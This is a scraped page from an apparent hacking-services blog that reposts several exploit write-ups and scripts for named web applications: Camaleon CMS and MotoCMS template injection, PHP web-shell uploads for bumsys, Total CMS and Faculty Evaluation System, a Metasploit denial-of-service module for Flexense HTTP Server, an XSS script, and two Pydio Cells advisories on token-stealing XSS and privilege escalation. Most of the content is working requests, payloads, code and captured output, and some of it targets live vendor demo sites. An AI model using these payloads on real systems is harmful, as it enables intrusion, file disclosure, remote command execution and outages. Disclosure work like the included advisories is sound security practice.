Exploit Title: Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI)
Exploit Author: PARAG BAGUL
CVE: CVE-2023-30145
## Description
Camaleon CMS v2.7.0 was discovered to contain a Server-Side Template
Injection (SSTI) vulnerability via the formats parameter.
## Affected Component
All versions below 2.7.0 are affected.
## Author
Parag Bagul
## Steps to Reproduce
1. Open the target URL: `https://target.com/admin/media/upload`
2. Upload any file and intercept the request.
3. In the `formats` parameter value, add the payload `test<%= 7*7 %>test`.
4. Check the response. It should return the multiplication of 77 with the
message "File format not allowed (dqopi49vuuvm)".
##Detection:
#Request:
POST /admin/media/upload?actions=false HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101
Firefox/102.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target.com/admin/profile/edit
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------327175120238370517612522354688
Content-Length: 1200
Origin: http://target.com
DNT: 1
Connection: close
Cookie: cookie
-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="file_upload"; filename="test.txt"
Content-Type: text/plain
test
-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="versions"
-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="thumb_size"
-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="formats"
test<%= 7*7 %>test
-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="media_formats"
image
-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="dimension"
-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="private"
-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="folder"
/
-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="skip_auto_crop"
true
-----------------------------327175120238370517612522354688--
#Response:
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
Cache-Control: max-age=0, private, must-revalidate
Set-Cookie: cookie
Content-Length: 41
File format not allowed (test49test)
#Exploitation:
To execute a command, add the following payload:
testqopi<%= File.open('/etc/passwd').read %>fdtest
Request:
POST /admin/media/upload?actions=true HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101
Firefox/102.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target.com/admin/media
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------104219633614133026962934729021
Content-Length: 1237
Origin: http://target.com
DNT: 1
Connection: close
Cookie: cookie
-----------------------------104219633614133026962934729021
Content-Disposition: form-data; name="file_upload"; filename="test.txt"
Content-Type: text/plain
test
-----------------------------104219633614133026962934729021
Content-Disposition: form-data; name="versions"
-----------------------------104219633614133026962934729021
Content-Disposition: form-data; name="thumb_size"
-----------------------------104219633614133026962934729021
Content-Disposition: form-data; name="formats"
dqopi<%= File.open('/etc/passwd').read %>fdfdsf
-----------------------------104219633614133026962934729021
Content-Disposition: form-data; name="media_formats"
-----------------------------104219633614133026962934729021
Content-Disposition: form-data; name="dimension"
-----------------------------104219633614133026962934729021
Content-Disposition: form-data; name="private"
-----------------------------104219633614133026962934729021
Content-Disposition: form-data; name="folder"
/
-----------------------------104219633614133026962934729021
Content-Disposition: form-data; name="skip_auto_crop"
true
-----------------------------104219633614133026962934729021--
Response:
Response:
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
Set-Cookie: cookie
Content-Length: 1816
File format not allowed (dqopiroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
fdfdsf)
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863112358
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Exploit Title: - unilogies/bumsys v1.0.3-beta - Unrestricted File Upload
Google Dork : NA
Date: 19-01-2023
Exploit Author: AFFAN AHMED
Vendor Homepage: https://github.com/unilogies/bumsys
Software Link: https://github.com/unilogies/bumsys/archive/refs/tags/v1.0.3-beta.zip
Version: 1.0.3-beta
Tested on: Windows 11, XAMPP-8.2.0
CVE : CVE-2023-0455
================================
Steps_TO_Reproduce
================================
- Navigate to this URL:[https://demo.bumsys.org/settings/shop-list/](https://demo.bumsys.org/settings/shop-list/)
- Click on action button to edit the Profile
- Click on select logo button to upload the image
- Intercept the POST Request and do the below changes .
================================================================
Burpsuite-Request
================================================================
POST /xhr/?module=settings&page=updateShop HTTP/1.1
Host: demo.bumsys.org
Cookie: eid=1; currencySymbol=%EF%B7%BC; keepAlive=1; __0bb0b4aaf0f729565dbdb80308adac3386976ad3=9lqop41ssg3i9trh73enqbi0i7
Content-Length: 1280
Sec-Ch-Ua: "Chromium";v="109", "Not_A Brand";v="99"
X-Csrf-Token: 78abb0cc27ab54e87f66e8160dab3ab48261a8b4
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynO0QAD84ekUMuGaA
Accept: */*
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.bumsys.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.bumsys.org/settings/shop-list/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopName"
TEST
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopAddress"
test
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopCity"
testcity
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopState"
teststate
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopPostalCode"
700056
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopCountry"
testIND
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopPhone"
895623122
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopEmail"
test@gmail.com
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopInvoiceFooter"
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopLogo"; filename="profile picture.php"
Content-Type: image/png
<?php echo system($_REQUEST['dx']); ?>
====================================================================================
Burpsuite-Response
====================================================================================
HTTP/1.1 200 OK
Date: Thu, 19 Jan 2023 07:14:26 GMT
Server: Apache/2.4.51 (Unix) OpenSSL/1.0.2k-fips
X-Powered-By: PHP/7.0.33
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 65
<div class='alert alert-success'>Shop successfully updated.</div>
====================================================================================
VIDEO-POC : https://youtu.be/nwxIoSlyllQ
##
# Exploit Title: Flexense HTTP Server 10.6.24 - Buffer Overflow (DoS) (Metasploit)
# Date: 2018-03-09
# Exploit Author: Ege Balci
# Vendor Homepage: https://www.flexense.com/downloads.html
# Version: <= 10.6.24
# CVE : CVE-2018-8065
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Dos
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Flexense HTTP Server Denial Of Service',
'Description' => %q{
This module triggers a Denial of Service vulnerability in the Flexense HTTP server.
Vulnerability caused by a user mode write access memory violation and can be triggered with
rapidly sending variety of HTTP requests with long HTTP header values.
Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below vesions reportedly vulnerable.
},
'Author' => [ 'Ege Balci <ege.balci@invictuseurope.com>' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2018-8065'],
[ 'URL', 'https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS' ],
],
'DisclosureDate' => '2018-03-09'))
register_options(
[
Opt::RPORT(80),
OptString.new('PacketCount', [ true, "The number of packets to be sent (Recommended: Above 1725)" , 1725 ]),
OptString.new('PacketSize', [ true, "The number of bytes in the Accept header (Recommended: 4088-5090" , rand(4088..5090) ])
])
end
def check
begin
connect
sock.put("GET / HTTP/1.0\r\n\r\n")
res = sock.get
if res and res.include? 'Flexense HTTP Server v10.6.24'
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
rescue Rex::ConnectionRefused
print_error("Target refused the connection")
Exploit::CheckCode::Unknown
rescue
print_error("Target did not respond to HTTP request")
Exploit::CheckCode::Unknown
end
end
def run
unless check == Exploit::CheckCode::Appears
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end
size = datastore['PacketSize'].to_i
print_status("Starting with packets of #{size}-byte strings")
count = 0
loop do
payload = ""
payload << "GET /" + Rex::Text.rand_text_alpha(rand(30)) + " HTTP/1.1\r\n"
payload << "Host: 127.0.0.1\r\n"
payload << "Accept: "+('A' * size)+"\r\n"
payload << "\r\n\r\n"
begin
connect
sock.put(payload)
disconnect
count += 1
break if count==datastore['PacketCount']
rescue ::Rex::InvalidDestination
print_error('Invalid destination! Continuing...')
rescue ::Rex::ConnectionTimeout
print_error('Connection timeout! Continuing...')
rescue ::Errno::ECONNRESET
print_error('Connection reset! Continuing...')
rescue ::Rex::ConnectionRefused
print_good("DoS successful after #{count} packets with #{size}-byte headers")
return true
end
end
print_error("DoS failed after #{count} packets of #{size}-byte strings")
end
end
#Exploit Title: Online Security Guards Hiring System 1.0 – REFLECTED XSS
#Google Dork : NA
#Date: 23-01-2023
#Exploit Author : AFFAN AHMED
#Vendor Homepage: https://phpgurukul.com
#Software Link: https://phpgurukul.com/projects/Online-Security-Guard-Hiring-System_PHP.zip
#Version: 1.0
#Tested on: Windows 11 + XAMPP + PYTHON-3.X
#CVE : CVE-2023-0527
#NOTE: TO RUN THE PROGRAM FIRST SETUP THE CODE WITH XAMPP AND THEN RUN THE BELOW PYTHON CODE TO EXPLOIT IT
# Below code check for both the parameter /admin-profile.php and in /search.php
#POC-LINK: https://github.com/ctflearner/Vulnerability/blob/main/Online-Security-guard-POC.md
import requests
import re
from colorama import Fore
print(Fore.YELLOW + "######################################################################" + Fore.RESET)
print(Fore.RED + "# TITLE: Online Security Guards Hiring System v1.0" + Fore.RESET)
print(Fore.RED + "# VULNERABILITY-TYPE : CROSS-SITE SCRIPTING (XSS)" + Fore.RESET)
print(Fore.RED + "# VENDOR OF THE PRODUCT : PHPGURUKUL" + Fore.RESET)
print(Fore.RED + "# AUTHOR : AFFAN AHMED" + Fore.RESET)
print(Fore.YELLOW +"######################################################################" + Fore.RESET)
print()
print(Fore.RED+"NOTE: To RUN THE CODE JUST TYPE : python3 exploit.py"+ Fore.RESET)
print()
# NAVIGATING TO ADMIN LOGIN PAGE
Website_url = "http://localhost/osghs/admin/login.php" # CHANGE THE URL ACCORDING TO YOUR SETUP
print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)
print(Fore.CYAN + "[**] Inserting the Username and Password in the Admin Login Form [**]" + Fore.RESET)
print(Fore.RED+"----------------------------------------------------------------------"+Fore.RESET)
Admin_login_credentials = {'username': 'admin', 'password': 'Test@123', 'login': ''}
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Referer': 'http://localhost/osghs/admin/login.php',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.9',
'Connection': 'close',
'Cookie': 'PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc',
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-User': '?1',
'Sec-Fetch-Dest': 'document'
}
response = requests.request("POST", Website_url, headers=headers, data = Admin_login_credentials)
if response.status_code == 200:
location = re.findall(r'document.location =\'(.*?)\'',response.text)
if location:
print(Fore.GREEN + "> Login Successful into Admin Account"+Fore.RESET)
print(Fore.GREEN + "> Popup:"+ Fore.RESET,location )
else:
print(Fore.GREEN + "> document.location not found"+ Fore.RESET)
else:
print(Fore.GREEN + "> Error:", response.status_code + Fore.RESET)
print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)
print(Fore.CYAN + " [**] Trying XSS-PAYLOAD in Admin-Name Parameter [**]" + Fore.RESET)
# NAVIGATING TO ADMIN PROFILE SECTION TO UPDATE ADMIN PROFILE
# INSTEAD OF /ADMIN-PROFILE.PHP REPLACE WITH /search.php TO FIND XSS IN SEARCH PARAMETER
Website_url= "http://localhost/osghs/admin/admin-profile.php" # CHANGE THIS URL ACCORDING TO YOUR PREFERENCE
# FOR CHECKING XSS IN ADMIN-PROFILE USE THE BELOW PAYLOAD
# FOR CHECKING XSS IN SEARCH.PHP SECTION REPLACE EVERYTHING AND PUT searchdata=<your-xss-payload>&search=""
payload = {
"adminname": "TESTAdmin<script>alert(\"From-Admin-Name\")</script>", # XSS-Payload , CHANGE THIS ACCORDING TO YOUR PREFERENCE
"username": "admin", # THESE DETAILS ARE RANDOM , CHANGE IT TO YOUR PREFERENCE
"mobilenumber": "8979555558",
"email": "admin@gmail.com",
"submit": "",
}
# SENDING THE RESPONSE WITH POST REQUEST
response = requests.post(Website_url, headers=headers, data=payload)
print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)
# CHECKING THE STATUS CODE 200 AND ALSO FINDING THE SCRIPT TAG WITH THE HELP OF REGEX
if response.status_code == 200:
scripts = re.findall(r'<script>alert\(.*?\)</script>', response.text)
print(Fore.GREEN + "> Response After Executing the Payload at adminname parameter : "+ Fore.RESET)
print(Fore.GREEN+">"+Fore.RESET,scripts)
Exploit Title: Pydio Cells 4.1.2 - Cross-Site Scripting (XSS) via File Download
Affected Versions: 4.1.2 and earlier versions
Fixed Versions: 4.2.0, 4.1.3, 3.0.12
Vulnerability Type: Cross-Site Scripting
Security Risk: high
Vendor URL: https://pydio.com/
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-004
Advisory Status: published
CVE: CVE-2023-32751
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32751
Introduction
============
"Pydio Cells is an open-core, self-hosted Document Sharing and
Collaboration platform (DSC) specifically designed for organizations
that need advanced document sharing and collaboration without security
trade-offs or compliance issues."
(from the vendor's homepage)
More Details
============
When a file named "xss.html" is downloaded in the Pydio Cells web application, a
download URL similar to the following is generated:
https://example.com/io/xss/xss.html
?AWSAccessKeyId=gateway
&Expires=1682495748
&Signature=920JV0Zy%2BrNYXjak7xksAxRpRp8%3D
&response-content-disposition=attachment%3B%20filename%3Dxss.html
&pydio_jwt=qIe9DUut-OicxRzNVlynMf6CTENB0J-J[...]
The URL is akin to a presigned URL as used by the Amazon S3 service. It
contains the URL parameter "response-content-disposition" which is set
to "attachment" causing the response to contain a "Content-Disposition"
header with that value. Therefore, the browser downloads the file
instead of interpreting it. The URL also contains a signature and expiry
timestamp, which are checked by the backend. Unlike a presigned URL as used
by S3, the URL also contains the parameter "pydio_jwt" with the JWT of
the user for authentication. Furthermore, the access key with the ID
"gateway" is referenced, which can be found in the JavaScript sources of
Pydio Cells together with the secret:
------------------------------------------------------------------------
_awsSdk.default.config.update({
accessKeyId: 'gateway',
secretAccessKey: 'gatewaysecret',
s3ForcePathStyle: !0,
httpOptions: {
timeout: PydioApi.getMultipartUploadTimeout()
}
});
------------------------------------------------------------------------
With this information it is possible to change the URL parameter
"response-content-disposition" to the value "inline" and then calculate
a valid signature for the resulting URL. Furthermore, the content type of
the response can be changed to "text/html" by also adding the URL
parameter "response-content-type" with that value. This would result in
a URL like the following for the previously shown example URL:
https://example.com/io/xss/xss.html?
AWSAccessKeyId=gateway
&Expires=1682495668
&Signature=HpKue0YQZrnp%2B665Jf1t7ONgfRg%3D
&response-content-disposition=inline
&response-content-type=text%2Fhtml
&pydio_jwt=qIe9DUut-OicxRzNVlynMf6CTENB0J-J[...]
Upon opening the URL in a browser, the HTML included in the file is
interpreted and any JavaScript code is run.
Proof of Concept
================
Upload a HTML file into an arbitrary location of a Pydio Cells instance.
For example with the following contents:
------------------------------------------------------------------------
<html>
<body>
<h1>Cross-Site Scriping</h1>
<script>
let token = JSON.parse(localStorage.token4).AccessToken;
alert(token);
</script>
</body>
</html>
------------------------------------------------------------------------
The contained JavaScript code reads the JWT access token for Pydio Cells
from the browser's local storage object and opens a message box. Instead
of just displaying the JWT, it could also be sent to an attacker. The
following JavaScript function can then be run within the browser's
developer console to generate a presigned URL for the HTML file:
------------------------------------------------------------------------
async function getPresignedURL(path) {
let client = PydioApi.getClient();
let node = new AjxpNode(path);
let metadata = {Bucket: "io", ResponseContentDisposition: "inline", Key: path, ResponseContentType: "text/html"};
let url = await client.buildPresignedGetUrl(node, null, "text/html", metadata);
return url;
}
await getPresignedURL("xss/xss.html");
------------------------------------------------------------------------
The code has to be run in context of Pydio Cells while being logged in.
If the resulting URL is opened in a browser, the JavaScript code
contained in the HTML file is run. If the attack is conducted in the
described way, the JWT of the attacker is exposed through the URL.
However, this can be circumvented by first generating a public URL
for the file and then constructing the presigned URL based on the
resulting download URL.
Workaround
==========
No workaround known.
Fix
===
Upgrade Pydio Cells to a version without the vulnerability.
Security Risk
=============
Attackers that can upload files to a Pydio Cells instance can construct
URLs that execute arbitrary JavaScript code in context of Pydio Cells
upon opening. This could for example be used to steal the authentication
tokens of users opening the URL. It is likely that such an attack
succeeds, since sharing URLs to files hosted using Pydio Cells is a
common use case of the application. Therefore, the vulnerability is
estimated to pose a high risk.
Timeline
========
2023-03-23 Vulnerability identified
2023-05-02 Customer approved disclosure to vendor
2023-05-02 Vendor notified
2023-05-03 CVE ID requested
2023-05-08 Vendor released fixed version
2023-05-14 CVE ID assigned
2023-05-16 Vendor asks for a few more days before the advisory is released
2023-05-30 Advisory released
References
==========
[1] https://aws.amazon.com/sdk-for-javascript/
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
=============================
RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/
--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Alter Posthof 1 Fax : +49 241 510081-99
52062 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen
Exploit Title: Pydio Cells 4.1.2 - Unauthorised Role Assignments
Affected Versions: 4.1.2 and earlier versions
Fixed Versions: 4.2.0, 4.1.3, 3.0.12
Vulnerability Type: Privilege Escalation
Security Risk: high
Vendor URL: https://pydio.com/
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-003
Advisory Status: published
CVE: CVE-2023-32749
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32749
Introduction
============
"Pydio Cells is an open-core, self-hosted Document Sharing and
Collaboration platform (DSC) specifically designed for organizations
that need advanced document sharing and collaboration without security
trade-offs or compliance issues."
(from the vendor's homepage)
More Details
============
Users can share cells or folders with other users on the same Pydio
instance. The web application allows to either select an already
existing user from a list or to create a new user by entering a new
username and password, if this functionality is enabled. When creating a
new user in this way, a HTTP PUT request like the following is sent:
------------------------------------------------------------------------
PUT /a/user/newuser HTTP/2
Host: example.com
User-Agent: agent
Authorization: Bearer O48gvjD[...]
Content-Type: application/json
Content-Length: 628
Cookie: token=AO[...]
{
"Attributes": {
"profile": "shared",
"parameter:core.conf:lang": "\"en-us\"",
"send_email": "false"
},
"Roles": [],
"Login": "newuser",
"Password": "secret!",
"GroupPath": "/",
"Policies": [...]
}
------------------------------------------------------------------------
The JSON object sent in the body contains the username and password
for the user to be created and an empty list for the key "Roles". The
response contains a JSON object similar to the following:
------------------------------------------------------------------------
{
"Uuid": "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce",
"GroupPath": "/",
"Attributes": {
"parameter:core.conf:lang": "\"en-us\"",
"profile": "shared"
},
"Roles": [
{
"Uuid": "EXTERNAL_USERS",
"Label": "External Users",
"Policies": [...]
},
{
"Uuid": "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce",
"Label": "User newuser",
"UserRole": true,
"Policies": [...]
}
],
"Login": "newuser",
"Policies": [....],
"PoliciesContextEditable": true
}
------------------------------------------------------------------------
The key "Roles" now contains a list with two objects, which seem to be
applied by default. The roles list in the HTTP request can be
modified to contain a list of all available UUIDs for roles, which can
be obtained by using the user search functionality. This results in a
new user account with all roles applied. By performing a login as the
newly created user, access to all cells and non-personal workspaces of
the whole Pydio instance is granted.
Proof of Concept
================
Login to the Pydio Cells web interface with a regular user and retrieve
the JWT from the HTTP requests. This can either be done using an HTTP
attack proxy or using the browser's developer tools. Subsequently, curl [1]
can be used as follows to retrieve a list of all users and their roles:
------------------------------------------------------------------------
$ export JWT="<insert JWT here>"
$ curl --silent \
--header "Authorization: Bearer $TOKEN" \
--header 'Content-Type: application/json' \
--data '{}' \
https://example.com/a/user | tee all_users.json
{"Users":[...]}
------------------------------------------------------------------------
Afterwards, jq [2] can be used to create a JSON document which can be
sent to the Pydio REST-API in order to create the external user "foobar"
with the password "hunter2" and all roles assigned:
------------------------------------------------------------------------
$ jq '.Users[].Roles' all_users.json \
| jq -s 'flatten | .[].Uuid | {Uuid: .}' \
| jq -s 'unique' \
| jq '{"Login": "foobar", "Password": "hunter2", "Attributes":
{"profile": "shared"}, "Roles": .}' \
| tee create_user.json
{
"Login": "foobar",
"Password": "hunter2",
"Attributes": {
"profile": "shared"
},
"Roles": [...]
}
------------------------------------------------------------------------
Finally, the following curl command can be issued to create the new external
user:
------------------------------------------------------------------------
$ curl --request PUT \
--silent \
--header "Authorization: Bearer $JWT" \
--header 'Content-Type: application/json' \
--data @create_user.json \
https://example.com/a/user/foobar
------------------------------------------------------------------------
Now, login with the newly created user to access all cells and
non-personal workspaces.
Workaround
==========
Disallow the creation of external users in the authentication settings.
Fix
===
Upgrade Pydio Cells to a version without the vulnerability.
Security Risk
=============
Attackers with access to any regular user account for a Pydio Cells instance can
extend their privileges by creating a new external user with all roles
assigned. Subsequently, they can access all folders and files in any
cell and workspace, except for personal workspaces. The creation of
external users is activated by default. Therefore, the vulnerability is
estimated to pose a high risk.
Timeline
========
2023-03-23 Vulnerability identified
2023-05-02 Customer approved disclosure to vendor
2023-05-02 Vendor notified
2023-05-03 CVE ID requested
2023-05-08 Vendor released fixed version
2023-05-14 CVE ID assigned
2023-05-16 Vendor asks for a few more days before the advisory is released
2023-05-30 Advisory released
References
==========
[1] https://curl.se/
[2] https://stedolan.github.io/jq/
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
=============================
RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/
# Exploit Title: Faculty Evaluation System 1.0 - Unauthenticated File Upload
# Date: 5/29/2023
# Author: Alex Gan
# Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/eval_2.zip
# Version: 1.0
# Tested on: LAMP Fedora server 38 (Thirty Eight) Apache/2.4.57 10.5.19-MariaDB PHP 8.2.6
# CVE: CVE-2023-33440
# References: https://nvd.nist.gov/vuln/detail/CVE-2023-33440
# https://www.exploit-db.com/exploits/49320
# https://github.com/F14me7wq/bug_report/tree/main/vendors/oretnom23/faculty-evaluation-system
#
#!/usr/bin/env python3
import os
import sys
import requests
import argparse
from bs4 import BeautifulSoup
from urllib.parse import urlparse
from requests.exceptions import ConnectionError, Timeout
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('-u', '--url', type=str, help='URL')
parser.add_argument('-p', '--payload', type=str, help='PHP webshell')
return parser.parse_args()
def get_user_input(args):
if not (args.url):
args.url = input('Use the -u argument or Enter URL:')
if not (args.payload):
args.payload = input('Use the -p argument or Enter file path PHP webshell: ')
return args.url, args.payload
def check_input_url(url):
parsed_url = urlparse(url)
if not parsed_url.scheme:
url = 'http://' + url
if parsed_url.path.endswith('/'):
url = url.rstrip('/')
return url
def check_host_availability(url):
try:
response = requests.head(url=url + '/login.php')
if response.status_code == 200:
print("[+] Host is accessible")
else:
print("[-] Host is not accessible")
print(" Status code:", response.status_code)
sys.exit()
except (ConnectionError, Timeout) as e:
print("[-] Host is not accessible")
sys.exit()
except requests.exceptions.RequestException as e:
print("[-] Error:", e)
sys.exit()
def make_request(url, method, files=None):
if method == 'GET':
response = requests.get(url)
elif method == 'POST':
response = requests.post(url, files=files)
else:
raise ValueError(f'Invalid HTTP method: {method}')
if response.status_code == 200:
print('[+] Request successful')
return response.text
else:
print(f'[-] Error {response.status_code}: {response.text}')
return None
def find_file(response_get, filename, find_url):
soup = BeautifulSoup(response_get, 'html.parser')
links = soup.find_all('a')
found_files = []
for link in links:
file_upl = link.get('href')
if file_upl.endswith(filename):
found_files.append(file_upl)
if found_files:
print(' File found:')
for file in found_files:
print('[*] ' + file)
print(' Full URL of your file:')
for file_url in found_files:
print('[*] ' + find_url + file_url)
else:
print('[-] File not found')
def main():
args = get_args()
url, payload = get_user_input(args)
url = check_input_url(url)
check_host_availability(url)
post_url = url + "/ajax.php?action=save_user"
get_url = url + "/assets/uploads/"
filename = os.path.basename(payload)
payload_file = [('img',(filename,open(args.payload,'rb'),'application/octet-stream'))]
print(" Loading payload file")
make_request(post_url, 'POST', files=payload_file)
print(" Listing the uploads directory")
response_get = make_request(get_url, 'GET')
print(" Finding the downloaded payload file")
find_file(response_get, filename, get_url)
if __name__ == "__main__":
main()
# Exploit Title: Total CMS 1.7.4 - Remote Code Execution (RCE)
# Date: 02/06/2023
# Exploit Author: tmrswrr
# Version: 1.7.4
# Vendor home page : https://www.totalcms.co/
1) Go to this page and click edit page button
https://www.totalcms.co/demo/soccer/
2)After go down and will you see downloads area
3)Add in this area shell.php file
?PNG
...
<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>" ?>
IEND
4) After open this file and write commands
https://www.totalcms.co/cms-data/depot/cmssoccerdepot/shell.php?cmd=id
Result :
?PNG ...
uid=996(caddy) gid=998(caddy) groups=998(caddy),33(www-data)
IEND
# Title: MotoCMS Version 3.4.3 - Server-Side Template Injection (SSTI)
# Author: tmrswrr
# Date: 31/05/2023
# Vendor: https://www.motocms.com
# Link: https://www.motocms.com/website-templates/demo/189526.html
# Vulnerable Version(s): MotoCMS 3.0.27
## Description
MotoCMS Version 3.4.3 Store Category Template was discovered to contain a Server-Side Template
Injection (SSTI) vulnerability via the keyword parameter.
## Steps to Reproduce
1. Open the target URL: https://template189526.motopreview.com/
2. Write payload here : https://template189526.motopreview.com/store/category/search/?page=1&limit=36&keyword={{7*7}}
3. You will be see result is 49
Vuln Url : https://template189526.motopreview.com/store/category/search/?page=1&limit=36&keyword={{7*7}}
GET /store/category/search/?page=&limit=&keyword={{7*7}} HTTP/1.1
Host: template189526.motopreview.com
Cookie: PHPSESSID=7c0qgdvsehaf1a2do6s0bcl4p0; 9b7029e0bd3be0d41ebefd47d9f5ae46_session-started=1685536759239
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
